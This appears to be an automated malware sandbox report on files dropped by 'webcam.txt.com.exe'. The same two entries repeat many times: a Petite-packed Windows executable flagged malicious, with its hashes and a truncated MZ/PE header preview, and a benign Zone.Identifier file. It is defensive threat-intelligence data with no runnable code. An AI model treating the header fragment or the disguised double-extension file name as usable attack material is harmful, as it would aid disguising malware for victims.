                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
